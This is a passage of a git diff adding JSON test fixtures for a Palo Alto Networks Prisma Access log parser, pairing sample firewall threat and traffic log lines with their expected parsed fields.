cs1=deny-attackers cs1Label=Rule suser0=paloaltonetwork\\\\xxxxx duser0=paloaltonetwork\\\\xxxxx app=sina-weibo-base cs3=vsys1 cs3Label=VirtualLocation cs4=datacenter cs4Label=FromZone cs5=ethernet4Zone-test4 cs5Label=ToZone deviceInboundInterface=unknown deviceOutboundInterface=unknown cs6=rs-logging cs6Label=LogSetting cn1=947181 cn1Label=SessionID cnt=1 spt=13884 dpt=4228 sourceTranslatedPort=30116 destinationTranslatedPort=20966 proto=tcp act=drop-all request=some other fake filename PanOSThreatID=27379(27379) flexString2=server to client flexString2Label=DirectionOfAttack externalId=xxxxxxxxxxxxx PanOSSourceLocation=LY PanOSDestinationLocation=BR fileId=0 PanOSFileHash= PanOSApplianceOrCloud= PanOSURLCounter=0 PanOSFileType= PanOSSenderEmail= PanOSEmailSubject= PanOSRecipientEmail= PanOSReportID=0 PanOSDGHierarchyLevel1=11 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=xxxxx PanOSSourceUUID= PanOSDestinationUUID= PanOSIMSI=0 PanOSIMEI= PanOSParentSessionID=0 PanOSParentStarttime=Jan 01 1970 00:00:00 PanOSTunnel=N/A PanOSThreatCategory=unknown PanOSContentVersion=50059 PanOSSigFlags=0x0 PanOSRuleUUID=017e4d76-2003-47f4-8afc-1d35c808c615 PanOSHTTP2Connection=0 PanOSDynamicUserGroupName= PanOSX-Forwarded-ForIP= PanOSSourceDeviceCategory=X-Phone PanOSSourceDeviceProfile=x-profile PanOSSourceDeviceModel=Note 4G PanOSSourceDeviceVendor=Lenovo PanOSSourceDeviceOSFamily=K6 PanOSSourceDeviceOSVersion=Android v9 PanOSSourceDeviceHost=pan-505 PanOSSourceDeviceMac=596703749274 PanOSDestinationDeviceCategory=X-Phone PanOSDestinationDeviceProfile=x-profile PanOSDestinationDeviceModel=MI PanOSDestinationDeviceVendor=Xiaomi PanOSDestinationDeviceOSFamily=A1 PanOSDestinationDeviceOSVersion=Android v9.1 PanOSDestinationDeviceHost=pan-622 PanOSDestinationDeviceMac=620797415366 PanOSContainerID=1873cc5c-0d31 PanOSContainerNameSpace=pns_default PanOSSourceEDL= PanOSDestinationEDL= PanOSHostID=xxxxxxxxxxxxxx PanOSEndpointSerialNumber=xxxxxxxxxxxxxx PanOSDomainEDL= PanOSSourceDynamicAddressGroup= PanOSDestinationDynamicAddressGroup= PanOSPartialHash=0 PanOSTimeGeneratedHighResolution=Mar 01 2021 20:48:16 PanOSNSSAINetworkSliceType=dc"
+  },
+  "expected": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|THREAT|spyware|1|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 20:48:21 deviceExternalId=xxxxxxxxxxxxx start=Mar 01 2021 20:48:16 PanOSApplicationCategory=general-internet PanOSApplicationContainer=sina-weibo PanOSApplicationRisk=4 PanOSApplicationSubcategory=social-networking PanOSApplicationTechnology=browser-based PanOSCaptivePortal=false PanOSCloudHostname=xxxxx PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSDestinationDeviceClass= PanOSDestinationDeviceOS= dntdom=paloaltonetwork duser=xxxxx duid= PanOSHTTPMethod=get PanOSInboundInterfaceDetailsPort=0 PanOSInboundInterfaceDetailsSlot=0 PanOSInboundInterfaceDetailsType=unknown PanOSInboundInterfaceDetailsUnit=0 PanOSIsClienttoServer=true PanOSIsContainer=false PanOSIsDecryptMirror=false PanOSIsDecrypted=false PanOSIsDuplicateLog=false PanOSIsEncrypted=false PanOSIsIPV6=false PanOSIsMptcpOn=false PanOSIsNonStandardDestinationPort=false PanOSIsPacketCapture=false PanOSIsPhishing=false PanOSIsPrismaNetwork=false PanOSIsPrismaUsers=false PanOSIsProxy=false PanOSIsReconExcluded=false PanOSIsSaaSApplication=false PanOSIsServertoClient=false PanOSIsSourceXForwarded=true PanOSIsSystemReturn=true PanOSIsTransaction=false PanOSIsTunnelInspected=false PanOSIsURLDenied=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSNAT=false PanOSNonStandardDestinationPort=13884 PanOSOutboundInterfaceDetailsPort=0 PanOSOutboundInterfaceDetailsSlot=0 PanOSOutboundInterfaceDetailsType=unknown PanOSOutboundInterfaceDetailsUnit=0 PanOSPacket= PanOSPayloadProtocolID=-1 PanOSSanctionedStateOfApp=false PanOSSeverity=Informational PanOSSourceDeviceClass= PanOSSourceDeviceOS= sntdom=paloaltonetwork suser=xxxxx suid= cat=27379 PanOSThreatNameFirewall=27379 PanOSTunneledApplication=tunneled-app PanOSURLDomain= PanOSUsers=paloaltonetwork\\\\xxxxx PanOSVerdict= PanOSVirtualSystemID=1 c6a2=fe80:110:8897:efab:9202:b3ff:fe1e:8329 c6a2Label=Source IPv6 Address c6a3=fe80:110:8897:efab:9202:b3ff:fe1e:8329 c6a3Label=Destination IPv6 Address sourceTranslatedAddress=1.1.1.1 destinationTranslatedAddress=1.1.1.1 cs1=deny-attackers cs1Label=Rule suser0=paloaltonetwork\\\\xxxxx duser0=paloaltonetwork\\\\xxxxx app=sina-weibo-base cs3=vsys1 cs3Label=VirtualLocation cs4=datacenter cs4Label=FromZone cs5=ethernet4Zone-test4 cs5Label=ToZone deviceInboundInterface=unknown deviceOutboundInterface=unknown cs6=rs-logging cs6Label=LogSetting cn1=947181 cn1Label=SessionID cnt=1 spt=13884 dpt=4228 sourceTranslatedPort=30116 destinationTranslatedPort=20966 proto=tcp act=drop-all request=some other fake filename PanOSThreatID=27379(27379) flexString2=server to client flexString2Label=DirectionOfAttack externalId=xxxxxxxxxxxxx PanOSSourceLocation=LY PanOSDestinationLocation=BR fileId=0 PanOSFileHash= PanOSApplianceOrCloud= PanOSURLCounter=0 PanOSFileType= PanOSSenderEmail= PanOSEmailSubject= PanOSRecipientEmail= PanOSReportID=0 PanOSDGHierarchyLevel1=11 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=xxxxx PanOSSourceUUID= PanOSDestinationUUID= PanOSIMSI=0 PanOSIMEI= PanOSParentSessionID=0 PanOSParentStarttime=Jan 01 1970 00:00:00 PanOSTunnel=N/A PanOSThreatCategory=unknown PanOSContentVersion=50059 PanOSSigFlags=0x0 PanOSRuleUUID=017e4d76-2003-47f4-8afc-1d35c808c615 PanOSHTTP2Connection=0 PanOSDynamicUserGroupName= PanOSX-Forwarded-ForIP= PanOSSourceDeviceCategory=X-Phone PanOSSourceDeviceProfile=x-profile PanOSSourceDeviceModel=Note 4G PanOSSourceDeviceVendor=Lenovo PanOSSourceDeviceOSFamily=K6 PanOSSourceDeviceOSVersion=Android v9 PanOSSourceDeviceHost=pan-505 PanOSSourceDeviceMac=596703749274 PanOSDestinationDeviceCategory=X-Phone PanOSDestinationDeviceProfile=x-profile PanOSDestinationDeviceModel=MI PanOSDestinationDeviceVendor=Xiaomi PanOSDestinationDeviceOSFamily=A1 PanOSDestinationDeviceOSVersion=Android v9.1 PanOSDestinationDeviceHost=pan-622 PanOSDestinationDeviceMac=620797415366 PanOSContainerID=1873cc5c-0d31 PanOSContainerNameSpace=pns_default PanOSSourceEDL= PanOSDestinationEDL= PanOSHostID=xxxxxxxxxxxxxx PanOSEndpointSerialNumber=xxxxxxxxxxxxxx PanOSDomainEDL= PanOSSourceDynamicAddressGroup= PanOSDestinationDynamicAddressGroup= PanOSPartialHash=0 PanOSTimeGeneratedHighResolution=Mar 01 2021 20:48:16 PanOSNSSAINetworkSliceType=dc",
+    "event": {
+      "action": "drop-all",
+      "category": [
+        "malware"
+      ],
+      "dataset": "threat",
+      "severity": 1,
+      "start": "2021-03-01T20:48:16Z",
+      "timezone": "UTC",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2021-03-01T20:48:21Z",
+    "action": {
+      "type": "spyware"
+    },
+    "destination": {
+      "geo": {
+        "country_iso_code": "BR"
+      },
+      "nat": {
+        "ip": "1.1.1.1",
+        "port": 20966
+      },
+      "port": 4228,
+      "user": {
+        "name": "xxxxx"
+      }
+    },
+    "host": {
+      "hostname": "xxxxx",
+      "id": "xxxxxxxxxxxxx",
+      "mac": "596703749274",
+      "name": "xxxxx",
+      "os": {
+        "family": "K6",
+        "version": "Android v9"
+      },
+      "type": "X-Phone"
+    },
+    "log": {
+      "hostname": "xxxxx",
+      "logger": "threat"
+    },
+    "network": {
+      "application": "sina-weibo-base",
+      "transport": "tcp"
+    },
+    "observer": {
+      "egress": {
+        "interface": {
+          "alias": "ethernet4Zone-test4"
+        }
+      },
+      "ingress": {
+        "interface": {
+          "alias": "datacenter",
+          "name": "n"
+        }
+      },
+      "product": "PAN-OS",
+      "type": "LF",
+      "vendor": "Palo Alto Networks",
+      "version": "2.0"
+    },
+    "paloalto": {
+      "DirectionOfAttack": "server to client",
+      "PanOSContainerNameSpace": "pns_default",
+      "PanOSDestinationDeviceCategory": "X-Phone",
+      "PanOSDestinationDeviceHost": "pan-622",
+      "PanOSDestinationDeviceMac": "620797415366",
+      "PanOSDestinationDeviceModel": "MI",
+      "PanOSDestinationDeviceOSFamily": "A1",
+      "PanOSDestinationDeviceOSVersion": "Android v9.1",
+      "PanOSDestinationDeviceProfile": "x-profile",
+      "PanOSDestinationDeviceVendor": "Xiaomi",
+      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
+      "PanOSSourceDeviceHost": "pan-505",
+      "PanOSSourceDeviceModel": "Note 4G",
+      "PanOSSourceDeviceProfile": "x-profile",
+      "PanOSSourceDeviceVendor": "Lenovo",
+      "PanOSSourceLocation": "LY",
+      "PanOSThreatID": "27379(27379)",
+      "VirtualLocation": "vsys1",
+      "endpoint": {
+        "serial_number": "xxxxxxxxxxxxxx"
+      },
+      "threat": {
+        "id": "27379(27379)"
+      }
+    },
+    "related": {
+      "hosts": [
+        "xxxxx"
+      ],
+      "ip": [
+        "1.1.1.1"
+      ],
+      "user": [
+        "xxxxx"
+      ]
+    },
+    "rule": {
+      "name": "deny-attackers",
+      "uuid": "017e4d76-2003-47f4-8afc-1d35c808c615"
+    },
+    "source": {
+      "nat": {
+        "ip": "1.1.1.1",
+        "port": 30116
+      },
+      "port": 13884,
+      "user": {
+        "name": "xxxxx"
+      }
+    },
+    "user": {
+      "name": "xxxxx"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/threat_csv.json b/Palo Alto Networks/paloalto-prima-access/tests/threat_csv.json
new file mode 100644
index 000000000..571880744
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/threat_csv.json	
@@ -0,0 +1,85 @@
+{
+  "input": {
+    "message": "1,2021/08/31 14:00:02,001701000000,THREAT,vulnerability,2049,2021/08/31 14:00:02,10.0.0.2,10.2.0.1,0.0.0.0,0.0.0.0,abcd,,,web-browsing,vsys,env,zone2,a1.1,aec.2,podl,2021/08/31 14:00:02,279429,2,12345,80,0,0,0x2000,tcp,alert,\"EXAMPLE.PDF\",PDF Exploit Evasion Found(34805),any,informational,server-to-client,1320000,0x2000000000000000,10.0.0.0-10.255.255.255,10.0.0.0-10.255.255.255,0,,0,,,1,,,,,,,,0,0,0,0,0,,FW,,,,,0,,0,,N/A,code-execution,AppThreat-0000-1111,0x0,0,422342342,"
+  },
+  "expected": {
+    "message": "1,2021/08/31 14:00:02,001701000000,THREAT,vulnerability,2049,2021/08/31 14:00:02,10.0.0.2,10.2.0.1,0.0.0.0,0.0.0.0,abcd,,,web-browsing,vsys,env,zone2,a1.1,aec.2,podl,2021/08/31 14:00:02,279429,2,12345,80,0,0,0x2000,tcp,alert,\"EXAMPLE.PDF\",PDF Exploit Evasion Found(34805),any,informational,server-to-client,1320000,0x2000000000000000,10.0.0.0-10.255.255.255,10.0.0.0-10.255.255.255,0,,0,,,1,,,,,,,,0,0,0,0,0,,FW,,,,,0,,0,,N/A,code-execution,AppThreat-0000-1111,0x0,0,422342342,",
+    "event": {
+      "action": "alert",
+      "category": [
+        "vulnerability"
+      ],
+      "code": "34805",
+      "dataset": "threat",
+      "outcome": "success",
+      "reason": "PDF Exploit Evasion Found",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2021-08-31T14:00:02Z",
+    "action": {
+      "name": "alert",
+      "outcome": "success",
+      "type": "vulnerability"
+    },
+    "destination": {
+      "address": "10.2.0.1",
+      "ip": "10.2.0.1",
+      "nat": {
+        "ip": "0.0.0.0",
+        "port": 0
+      },
+      "port": 80
+    },
+    "file": {
+      "name": "EXAMPLE.PDF",
+      "path": "EXAMPLE.PDF"
+    },
+    "log": {
+      "hostname": "FW",
+      "level": "informational",
+      "logger": "threat"
+    },
+    "network": {
+      "application": "web-browsing",
+      "transport": "tcp"
+    },
+    "observer": {
+      "name": "FW",
+      "product": "PAN-OS",
+      "serial_number": "001701000000"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "vulnerability",
+      "VirtualLocation": "vsys",
+      "threat": {
+        "id": "34805",
+        "name": "PDF Exploit Evasion Found"
+      }
+    },
+    "related": {
+      "ip": [
+        "0.0.0.0",
+        "10.0.0.2",
+        "10.2.0.1"
+      ]
+    },
+    "rule": {
+      "name": "abcd"
+    },
+    "source": {
+      "address": "10.0.0.2",
+      "ip": "10.0.0.2",
+      "nat": {
+        "ip": "0.0.0.0",
+        "port": 0
+      },
+      "port": 12345
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/traffic1_csv.json b/Palo Alto Networks/paloalto-prima-access/tests/traffic1_csv.json
new file mode 100644
index 000000000..4fd068d08
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/traffic1_csv.json	
@@ -0,0 +1,108 @@
+{
+  "input": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|TRAFFIC|end|3|dtz=UTC rt=Jul 31 2022 12:46:24 deviceExternalId=000000000000 PanOSConfigVersion=10.1 start=Jul 31 2022 12:46:07 src=1.2.3.4 dst=5.6.7.8 sourceTranslatedAddress=4.3.2.1 destinationTranslatedAddress=8.7.6.5 cs1=SO Access cs1Label=Rule suser= duser= app=outlook-web-online cs3=vsys1 cs3Label=VirtualLocation cs4=Trust cs4Label=FromZone cs5=Untrust cs5Label=ToZone deviceInboundInterface=ethernet1/10 deviceOutboundInterface=ethernet1/11 cs6=Panorama_LOF cs6Label=LogSetting cn1=595456 cn1Label=SessionID cnt=1 spt=52066 dpt=443 sourceTranslatedPort=47252 destinationTranslatedPort=443 proto=tcp act=allow PanOSBytes=12503 out=5651 in=6852 cn2=24 cn2Label=PacketsTotal PanOSSessionStartTime=Jul 31 2022 12:43:06 cn3=178 cn3Label=SessionDuration cs2=computer-and-internet-info cs2Label=URLCategory externalId=1111111111111111111 PanOSSourceLocation=10.0.0.0-10.255.255.255 PanOSDestinationLocation=UK PanOSPacketsSent=13 PanOSPacketsReceived=11 reason=tcp-fin PanOSDGHierarchyLevel1=997 PanOSDGHierarchyLevel2=738 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=LF-5698-NR cat=from-policy PanOSSourceUUID= PanOSDestinationUUID= PanOSIMSI=0 PanOSIMEI= PanOSParentSessionID=0 PanOSParentStarttime=Jan 01 1970 00:00:00 PanOSTunnel=N/A PanOSEndpointAssociationID=0 PanOSChunksTotal=0 PanOSChunksSent=0 PanOSChunksReceived=0 PanOSRuleUUID=2e259acc-c7ce-43d0-857f-f1a457e02699 PanOSHTTP2Connection=0 PanOSLinkChangeCount=0 PanOSSDWANPolicyName= PanOSLinkSwitches= PanOSSDWANCluster= PanOSSDWANDeviceType= PanOSSDWANClusterType= PanOSSDWANSite= PanOSDynamicUserGroupName= PanOSX-Forwarded-ForIP= PanOSSourceDeviceCategory= PanOSSourceDeviceProfile= PanOSSourceDeviceModel= PanOSSourceDeviceVendor= PanOSSourceDeviceOSFamily= PanOSSourceDeviceOSVersion= PanOSSourceDeviceHost= PanOSSourceDeviceMac= PanOSDestinationDeviceCategory= PanOSDestinationDeviceProfile= PanOSDestinationDeviceModel= PanOSDestinationDeviceVendor= PanOSDestinationDeviceOSFamily= PanOSDestinationDeviceOSVersion= PanOSDestinationDeviceHost= PanOSDestinationDeviceMac= PanOSContainerID= PanOSContainerNameSpace= PanOSContainerName= PanOSSourceEDL= PanOSDestinationEDL= PanOSGPHostID= PanOSEndpointSerialNumber= PanOSSourceDynamicAddressGroup= PanOSDestinationDynamicAddressGroup= PanOSHASessionOwner= PanOSTimeGeneratedHighResolution=Jul 31 2022 12:46:07 PanOSNSSAINetworkSliceType= PanOSNSSAINetworkSliceDifferentiator=\n"
+  },
+  "expected": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|TRAFFIC|end|3|dtz=UTC rt=Jul 31 2022 12:46:24 deviceExternalId=000000000000 PanOSConfigVersion=10.1 start=Jul 31 2022 12:46:07 src=1.2.3.4 dst=5.6.7.8 sourceTranslatedAddress=4.3.2.1 destinationTranslatedAddress=8.7.6.5 cs1=SO Access cs1Label=Rule suser= duser= app=outlook-web-online cs3=vsys1 cs3Label=VirtualLocation cs4=Trust cs4Label=FromZone cs5=Untrust cs5Label=ToZone deviceInboundInterface=ethernet1/10 deviceOutboundInterface=ethernet1/11 cs6=Panorama_LOF cs6Label=LogSetting cn1=595456 cn1Label=SessionID cnt=1 spt=52066 dpt=443 sourceTranslatedPort=47252 destinationTranslatedPort=443 proto=tcp act=allow PanOSBytes=12503 out=5651 in=6852 cn2=24 cn2Label=PacketsTotal PanOSSessionStartTime=Jul 31 2022 12:43:06 cn3=178 cn3Label=SessionDuration cs2=computer-and-internet-info cs2Label=URLCategory externalId=1111111111111111111 PanOSSourceLocation=10.0.0.0-10.255.255.255 PanOSDestinationLocation=UK PanOSPacketsSent=13 PanOSPacketsReceived=11 reason=tcp-fin PanOSDGHierarchyLevel1=997 PanOSDGHierarchyLevel2=738 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=LF-5698-NR cat=from-policy PanOSSourceUUID= PanOSDestinationUUID= PanOSIMSI=0 PanOSIMEI= PanOSParentSessionID=0 PanOSParentStarttime=Jan 01 1970 00:00:00 PanOSTunnel=N/A PanOSEndpointAssociationID=0 PanOSChunksTotal=0 PanOSChunksSent=0 PanOSChunksReceived=0 PanOSRuleUUID=2e259acc-c7ce-43d0-857f-f1a457e02699 PanOSHTTP2Connection=0 PanOSLinkChangeCount=0 PanOSSDWANPolicyName= PanOSLinkSwitches= PanOSSDWANCluster= PanOSSDWANDeviceType= PanOSSDWANClusterType= PanOSSDWANSite= PanOSDynamicUserGroupName= PanOSX-Forwarded-ForIP= PanOSSourceDeviceCategory= PanOSSourceDeviceProfile= PanOSSourceDeviceModel= PanOSSourceDeviceVendor= PanOSSourceDeviceOSFamily= PanOSSourceDeviceOSVersion= PanOSSourceDeviceHost= PanOSSourceDeviceMac= PanOSDestinationDeviceCategory= PanOSDestinationDeviceProfile= PanOSDestinationDeviceModel= PanOSDestinationDeviceVendor= PanOSDestinationDeviceOSFamily= PanOSDestinationDeviceOSVersion= PanOSDestinationDeviceHost= PanOSDestinationDeviceMac= PanOSContainerID= PanOSContainerNameSpace= PanOSContainerName= PanOSSourceEDL= PanOSDestinationEDL= PanOSGPHostID= PanOSEndpointSerialNumber= PanOSSourceDynamicAddressGroup= PanOSDestinationDynamicAddressGroup= PanOSHASessionOwner= PanOSTimeGeneratedHighResolution=Jul 31 2022 12:46:07 PanOSNSSAINetworkSliceType= PanOSNSSAINetworkSliceDifferentiator=\n",
+    "event": {
+      "action": "allow",
+      "category": [
+        "network"
+      ],
+      "dataset": "traffic",
+      "duration": 178,
+      "reason": "tcp-fin",
+      "severity": 3,
+      "start": "2022-07-31T12:46:07Z",
+      "timezone": "UTC",
+      "type": [
+        "allowed"
+      ]
+    },
+    "@timestamp": "2022-07-31T12:46:24Z",
+    "action": {
+      "type": "end"
+    },
+    "destination": {
+      "address": "5.6.7.8",
+      "bytes": 5651,
+      "geo": {
+        "country_iso_code": "UK"
+      },
+      "ip": "5.6.7.8",
+      "nat": {
+        "ip": "8.7.6.5",
+        "port": 443
+      },
+      "packets": 11,
+      "port": 443
+    },
+    "host": {
+      "hostname": "LF-5698-NR",
+      "id": "000000000000",
+      "name": "LF-5698-NR"
+    },
+    "log": {
+      "hostname": "LF-5698-NR",
+      "logger": "traffic"
+    },
+    "network": {
+      "application": "outlook-web-online",
+      "bytes": 12503,
+      "packets": 24,
+      "transport": "tcp"
+    },
+    "observer": {
+      "egress": {
+        "interface": {
+          "alias": "Untrust",
+          "id": "11",
+          "name": "ethernet1/11"
+        }
+      },
+      "ingress": {
+        "interface": {
+          "alias": "Trust",
+          "id": "11",
+          "name": "0"
+        }
+      },
+      "product": "PAN-OS",
+      "type": "LF",
+      "vendor": "Palo Alto Networks",
+      "version": "2.0"
+    },
+    "paloalto": {
+      "PanOSSessionStartTime": "Jul 31 2022 12:43:06",
+      "PanOSSourceLocation": "10.0.0.0-10.255.255.255",
+      "URLCategory": "computer-and-internet-info",
+      "VirtualLocation": "vsys1"
+    },
+    "related": {
+      "hosts": [
+        "LF-5698-NR"
+      ],
+      "ip": [
+        "1.2.3.4",
+        "4.3.2.1",
+        "5.6.7.8",
+        "8.7.6.5"
+      ]
+    },
+    "rule": {
+      "name": "SO Access",
+      "uuid": "2e259acc-c7ce-43d0-857f-f1a457e02699"
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "bytes": 6852,
+      "ip": "1.2.3.4",
+      "nat": {
+        "ip": "4.3.2.1",
+        "port": 47252
+      },
+      "packets": 13,
+      "port": 52066
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/traffic2_csv.json b/Palo Alto Networks/paloalto-prima-access/tests/traffic2_csv.json
new file mode 100644
index 000000000..a892a2a7b
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/traffic2_csv.json	
@@ -0,0 +1,112 @@
+{
+  "input": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|TRAFFIC|end|3|dtz=UTC rt=Aug 02 2022 06:42:20 deviceExternalId=no-serial PanOSConfigVersion=10.0 start=Aug 02 2022 06:42:01 src= dst=1.1.1.1 sourceTranslatedAddress=1.1.1.1 destinationTranslatedAddress=1.1.1.1 cs1=Global_Outbound_internet_access cs1Label=Rule suser=user.name@corp.com duser= app=ssl cs3=vsys1 cs3Label=VirtualLocation cs4=trust cs4Label=FromZone cs5=untrust cs5Label=ToZone deviceInboundInterface=tunnel.1 deviceOutboundInterface=ethernet1/1 cs6=default cs6Label=LogSetting cn1=689028 cn1Label=SessionID cnt=1 spt=63516 dpt=443 sourceTranslatedPort=43823 destinationTranslatedPort=443 proto=tcp act=allow PanOSBytes=13443 out=2755 in=10688 cn2=32 cn2Label=PacketsTotal PanOSSessionStartTime=Aug 02 2022 06:41:44 cn3=0 cn3Label=SessionDuration cs2=low-risk cs2Label=URLCategory externalId=1112030318 PanOSSourceLocation=10.0.0.0-10.255.255.255 PanOSDestinationLocation=EU PanOSPacketsSent=13 PanOSPacketsReceived=19 reason=tcp-fin PanOSDGHierarchyLevel1=463 PanOSDGHierarchyLevel2=467 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=GP cloud service cat=from-policy PanOSSourceUUID= PanOSDestinationUUID= PanOSIMSI=0 PanOSIMEI= PanOSParentSessionID=0 PanOSParentStarttime=Jan 01 1970 00:00:00 PanOSTunnel=N/A PanOSEndpointAssociationID=0 PanOSChunksTotal=0 PanOSChunksSent=0 PanOSChunksReceived=0 PanOSRuleUUID=c38e111b-43fc-4de4-a17c-c372af557193 PanOSHTTP2Connection=0 PanOSLinkChangeCount=0 PanOSSDWANPolicyName= PanOSLinkSwitches= PanOSSDWANCluster= PanOSSDWANDeviceType= PanOSSDWANClusterType= PanOSSDWANSite= PanOSDynamicUserGroupName= PanOSX-Forwarded-ForIP= PanOSSourceDeviceCategory= PanOSSourceDeviceProfile= PanOSSourceDeviceModel= PanOSSourceDeviceVendor= PanOSSourceDeviceOSFamily= PanOSSourceDeviceOSVersion= PanOSSourceDeviceHost= PanOSSourceDeviceMac= PanOSDestinationDeviceCategory= PanOSDestinationDeviceProfile= PanOSDestinationDeviceModel= PanOSDestinationDeviceVendor= PanOSDestinationDeviceOSFamily= PanOSDestinationDeviceOSVersion= PanOSDestinationDeviceHost= PanOSDestinationDeviceMac= PanOSContainerID= PanOSContainerNameSpace= PanOSContainerName= PanOSSourceEDL= PanOSDestinationEDL= PanOSGPHostID= PanOSEndpointSerialNumber= PanOSSourceDynamicAddressGroup= PanOSDestinationDynamicAddressGroup= PanOSHASessionOwner= PanOSTimeGeneratedHighResolution=Aug 02 2022 06:42:02 PanOSNSSAINetworkSliceType= PanOSNSSAINetworkSliceDifferentiator="
+  },
+  "expected": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|TRAFFIC|end|3|dtz=UTC rt=Aug 02 2022 06:42:20 deviceExternalId=no-serial PanOSConfigVersion=10.0 start=Aug 02 2022 06:42:01 src= dst=1.1.1.1 sourceTranslatedAddress=1.1.1.1 destinationTranslatedAddress=1.1.1.1 cs1=Global_Outbound_internet_access cs1Label=Rule suser=user.name@corp.com duser= app=ssl cs3=vsys1 cs3Label=VirtualLocation cs4=trust cs4Label=FromZone cs5=untrust cs5Label=ToZone deviceInboundInterface=tunnel.1 deviceOutboundInterface=ethernet1/1 cs6=default cs6Label=LogSetting cn1=689028 cn1Label=SessionID cnt=1 spt=63516 dpt=443 sourceTranslatedPort=43823 destinationTranslatedPort=443 proto=tcp act=allow PanOSBytes=13443 out=2755 in=10688 cn2=32 cn2Label=PacketsTotal PanOSSessionStartTime=Aug 02 2022 06:41:44 cn3=0 cn3Label=SessionDuration cs2=low-risk cs2Label=URLCategory externalId=1112030318 PanOSSourceLocation=10.0.0.0-10.255.255.255 PanOSDestinationLocation=EU PanOSPacketsSent=13 PanOSPacketsReceived=19 reason=tcp-fin PanOSDGHierarchyLevel1=463 PanOSDGHierarchyLevel2=467 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=GP cloud service cat=from-policy PanOSSourceUUID= PanOSDestinationUUID= PanOSIMSI=0 PanOSIMEI= PanOSParentSessionID=0 PanOSParentStarttime=Jan 01 1970 00:00:00 PanOSTunnel=N/A PanOSEndpointAssociationID=0 PanOSChunksTotal=0 PanOSChunksSent=0 PanOSChunksReceived=0 PanOSRuleUUID=c38e111b-43fc-4de4-a17c-c372af557193 PanOSHTTP2Connection=0 PanOSLinkChangeCount=0 PanOSSDWANPolicyName= PanOSLinkSwitches= PanOSSDWANCluster= PanOSSDWANDeviceType= PanOSSDWANClusterType= PanOSSDWANSite= PanOSDynamicUserGroupName= PanOSX-Forwarded-ForIP= PanOSSourceDeviceCategory= PanOSSourceDeviceProfile= PanOSSourceDeviceModel= PanOSSourceDeviceVendor= PanOSSourceDeviceOSFamily= PanOSSourceDeviceOSVersion= PanOSSourceDeviceHost= PanOSSourceDeviceMac= PanOSDestinationDeviceCategory= PanOSDestinationDeviceProfile= PanOSDestinationDeviceModel= PanOSDestinationDeviceVendor= PanOSDestinationDeviceOSFamily= PanOSDestinationDeviceOSVersion= PanOSDestinationDeviceHost= PanOSDestinationDeviceMac= PanOSContainerID= PanOSContainerNameSpace= PanOSContainerName= PanOSSourceEDL= PanOSDestinationEDL= PanOSGPHostID= PanOSEndpointSerialNumber= PanOSSourceDynamicAddressGroup= PanOSDestinationDynamicAddressGroup= PanOSHASessionOwner= PanOSTimeGeneratedHighResolution=Aug 02 2022 06:42:02 PanOSNSSAINetworkSliceType= PanOSNSSAINetworkSliceDifferentiator=",
+    "event": {
+      "action": "allow",
+      "category": [
+        "network"
+      ],
+      "dataset": "traffic",
+      "duration": 0,
+      "reason": "tcp-fin",
+      "severity": 3,
+      "start": "2022-08-02T06:42:01Z",
+      "timezone": "UTC",
+      "type": [
+        "allowed"
+      ]
+    },
+    "@timestamp": "2022-08-02T06:42:20Z",
+    "action": {
+      "type": "end"
+    },
+    "destination": {
+      "address": "1.1.1.1",
+      "bytes": 2755,
+      "geo": {
+        "country_iso_code": "EU"
+      },
+      "ip": "1.1.1.1",
+      "nat": {
+        "ip": "1.1.1.1",
+        "port": 443
+      },
+      "packets": 19,
+      "port": 443
+    },
+    "host": {
+      "hostname": "GP cloud service",
+      "id": "no-serial",
+      "name": "GP cloud service"
+    },
+    "log": {
+      "hostname": "GP cloud service",
+      "logger": "traffic"
+    },
+    "network": {
+      "application": "ssl",
+      "bytes": 13443,
+      "packets": 32,
+      "transport": "tcp"
+    },
+    "observer": {
+      "egress": {
+        "interface": {
+          "alias": "untrust",
+          "id": "1",
+          "name": "ethernet1/1"
+        }
+      },
+      "ingress": {
+        "interface": {
+          "alias": "trust",
+          "id": "1",
+          "name": "1"
+        }
+      },
+      "product": "PAN-OS",
+      "type": "LF",
+      "vendor": "Palo Alto Networks",
+      "version": "2.0"
+    },
+    "paloalto": {
+      "PanOSSessionStartTime": "Aug 02 2022 06:41:44",
+      "PanOSSourceLocation": "10.0.0.0-10.255.255.255",
+      "URLCategory": "low-risk",
+      "VirtualLocation": "vsys1"
+    },
+    "related": {
+      "hosts": [
+        "GP cloud service"
+      ],
+      "ip": [
+        "1.1.1.1"
+      ],
+      "user": [
